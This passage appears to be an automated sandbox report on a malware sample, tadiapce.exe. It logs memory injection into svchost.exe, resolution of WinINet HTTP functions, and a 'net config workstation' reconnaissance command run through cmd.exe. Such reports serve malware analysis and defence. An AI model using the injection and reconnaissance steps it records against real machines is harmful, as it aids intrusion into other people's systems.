| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040a8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040ac, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040b0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004074, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 8 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xe0000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x130000, size = 388 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x140000, size = 40 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xe0000, size = 8 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x140000, size = 747 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x150000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1a0000, size = 128 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1c0000, size = 44 |
|
1 |
Host Behavior
Module (50)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | WS2_32.dll | base_address = 0x75a90000 |
|
1 | |
| Load | ACTIVEDS.dll | base_address = 0x6eb70000 |
|
1 | |
| Load | WININET.dll | base_address = 0x77230000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76b10000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c00000 |
|
1 | |
| Load | ole32.dll | base_address = 0x76cd0000 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x76a60000 |
|
1 | |
| Get Handle | c:\windows\system32\msvcrt.dll | base_address = 0x76f80000 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 115, address_out = 0x75a93ab2 |
|
1 | |
| Get Address | c:\windows\system32\activeds.dll | function = 9, address_out = 0x6eb716e6 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpSendRequestW, address_out = 0x7725ba12 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetConnectW, address_out = 0x7725492c |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpOpenRequestW, address_out = 0x77254a42 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetReadFile, address_out = 0x7724b406 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetOpenW, address_out = 0x77259197 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetCloseHandle, address_out = 0x7724ab49 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Sleep, address_out = 0x76b5ba46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnterCriticalSection, address_out = 0x773777a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleOutputCP, address_out = 0x76bbe210 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WideCharToMultiByte, address_out = 0x76b6450e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77389ac5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThread, address_out = 0x76b6375d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x76b5ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcpyA, address_out = 0x76b59793 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapCreate, address_out = 0x76b63ea2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x76b5cf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x76b6395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x76b633d3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapFree, address_out = 0x76b5bbd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenW, address_out = 0x76b5d9e8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcpynW, address_out = 0x76b76118 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x76b6452b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapAlloc, address_out = 0x77382dd6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcessHeap, address_out = 0x76b61280 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenA, address_out = 0x76b5a611 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapReAlloc, address_out = 0x7739ff51 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExitThread, address_out = 0x7735f611 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77377760 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSection, address_out = 0x7738a149 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x76b5ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryAndExitThread, address_out = 0x76b4fdb8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateThread, address_out = 0x76b622a7 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x76c2426d |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoInitializeEx, address_out = 0x76d109ad |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = IIDFromString, address_out = 0x76ce2ff2 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoUninitialize, address_out = 0x76d186d3 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 9, address_out = 0x76a63eae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _wtoi, address_out = 0x76f8c823 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf_s, address_out = 0x76f9141b |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _vsnwprintf_s, address_out = 0x76f913b4 |
|
1 |
Network Behavior
Process #47: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #47 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /c net config workstation |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:03:48, Reason: Child Process |
| Unmonitor | End Time: 00:03:50, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa50 |
| Parent PID | 0xa70 (c:\windows\system32\svchost.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
318
|
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 232, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\net.exe | os_pid = 0xd4c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a3c0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:33:54 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11072982 |
|
1 | |
| Get Time | type = Performance Ctr, time = 30244665706 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #48: net.exe
0
0
| Information | Value |
|---|---|
| ID | #48 |
| File Name | c:\windows\system32\net.exe |
| Command Line | net config workstation |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:03:48, Reason: Child Process |
| Unmonitor | End Time: 00:03:50, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd4c |
| Parent PID | 0xa50 (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
918
|
Process #49: net1.exe
51
0
| Information | Value |
|---|---|
| ID | #49 |
| File Name | c:\windows\system32\net1.exe |
| Command Line | C:\Windows\system32\net1 config workstation |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:03:48, Reason: Child Process |
| Unmonitor | End Time: 00:03:50, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3dc |
| Parent PID | 0xd4c (c:\windows\system32\net.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
87C
0x
3F8
0x
D5C
|
Host Behavior
File (36)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
17 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 49 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 47 |
|
2 | |
| Write | STD_ERROR_HANDLE | size = 51 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 2 |
|
5 | |
| Write | STD_ERROR_HANDLE | size = 39 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 68 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 61 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 48 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 40 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 41 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 42 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 37 |
|
1 |
Registry (3)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = ProductName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = ProductName, data = Windows 7 Professional, type = REG_SZ |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | NETMSG | base_address = 0x72190000 |
|
1 | |
| Get Handle | c:\windows\system32\net1.exe | base_address = 0x440000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\net1.exe, file_name_orig = C:\Windows\system32\net1.exe, size = 260 |
|
1 |
Service (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Service Name | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
User (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Username | user_name_out = 2XC7u663GxWc |
|
2 |
System (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = ZgW5tdPu, type = ComputerNameDnsFullyQualified |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:54 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11073247 |
|
1 | |
| Get Time | type = Performance Ctr, time = 30302875396 |
|
1 |
Process #50: svchost.exe
247
2
| Information | Value |
|---|---|
| ID | #50 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | svchost.exe |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:03:50, Reason: Child Process |
| Unmonitor | End Time: 00:04:16, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:26 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xda0 |
| Parent PID | 0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D90
0x
DCC
0x
DDC
0x
DC8
0x
DBC
|
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x50000, size = 367 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xa0000, size = 112 |
|
47 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x602104, size = 12 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd40000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd41000, size = 5632 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd43000, size = 512 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd44000, size = 512 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd45000, size = 36 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd46000, size = 512 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47000, size = 1536 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd48000, size = 512 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 26 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xb0000, size = 12 |
|
6 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 19 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xb0000, size = 16 |
|
37 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47138, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 15 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4713c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47140, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 14 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47144, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 12 |
|
6 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4714c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 10 |
|
5 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47150, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47154, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 13 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47158, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4715c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 17 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47160, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47164, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47168, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4716c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 11 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47170, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 9 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47174, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47178, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 6 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4717c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 20 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47180, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47184, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47188, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4718c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 16 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47194, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 23 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd47198, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4719c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 18 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd471a0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd471a4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd471ac, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 22 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd471b4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd471b8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 24 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd471c0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd471c4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd471c8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd471cc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd471d0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd471d4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd471d8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd471dc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xb0000, size = 4 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x340000, size = 1024 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x350000, size = 388 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x360000, size = 40 |
|
1 | |
